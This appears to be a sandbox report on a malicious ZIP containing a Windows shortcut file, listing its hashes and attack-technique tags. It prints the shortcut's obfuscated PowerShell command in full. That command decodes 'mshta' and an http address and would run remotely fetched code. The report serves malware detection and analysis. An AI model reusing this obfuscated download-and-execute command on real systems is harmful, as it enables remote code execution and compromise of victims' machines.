Malicious

91b5adbc44940878e0ce84a7503865f7001b85[...]5d5.zip

ZIP Archive | MD5: 8312c1f0c1814049b91b2aeaa52eea4a | Size: 1.23 KB | application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
MD5: 8312c1f0c1814049b91b2aeaa52eea4a
Sha1: c1b01325dc6e4d896a2edd553e907de4645987d2
Sha256: 0795450f0ad494abd58156c59cc1400a0784870ff54891872a56218dba21a7c4
Sha384: de82ef262ca3808c0da13c583cdde16223b90ae14a6372b9a4f6c6dd5b1a72cde3210cf236a9a2990a24ac62046eccf1
Sha512: 21151582c31f6848e430e9ff66368d49c3164bbc814299a936c13b295c28001fc11c167f239fa4e3278597efb83b8dddc570ac65702e6e40f12e5678422d5c62
SSDeep: 24:HNmDaJYMsS78CpAqDEC9CrzMHAT6PZtL6r/cIgpede21B1DaJl:tmuJ7sS7pAqDECkrJWZ6rWBkzuJl
TLSH: 7D2192C415884E91FEA0AEE24ED849D864E6920457781F6E48A84F718B75BA04F0B1CF
File Structure
91b5adbc44940878e0ce84a7503865f7001b8591d3ac1acbfd95d391222ba5d5.zip
91b5adbc44940878e0ce84a7503865f7001b8591d3ac1acbfd95d391222ba5d5.lnk
Archive Entry
LNK CommandLine: PowerShell, Batch Command, PowerShell Call, DeObfuscated, Malicious
[PowerShell Command]: PowerShell, DeObfuscated, Malicious
[Deobfuscated PS]: DeObfuscated, PowerShell, Malicious
[Lnk Summary]: Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -ExecutionPolicy UnRestricted $U='l/th9Omd56i:s.7aP8p214j'; &(-join($U[(981-969),(468-453),(916-916)])) :. (-join($U[(981-969),(468-453),(916-916)])); :. ~~ (-join($U[(909-903),(981-969),(894-891),(-321+323),(468-453)])); foreach($P in @((613-610),(514-512),(-921+923),(955-937),(-92+103),(-511+512),(352-351),(902-882),(-487+504),(845-837),(697-684),(-151+171),(-209+213),(-200+209),(-671+684),(-283+303),(690-670),(481-468),(443-423),(658-650),(-483+503),(390-389),(-981+991),(577-570),(499-477),(504-489),(556-555),(-495+511),(208-203),(-907+911),(-232+236),(-831+850),(-752+766),(-276+284),(585-571),(539-518),(-131+144),(-687+690),(212-210),(-528+543))){$e+=$U[$P]}; ~~ $e;
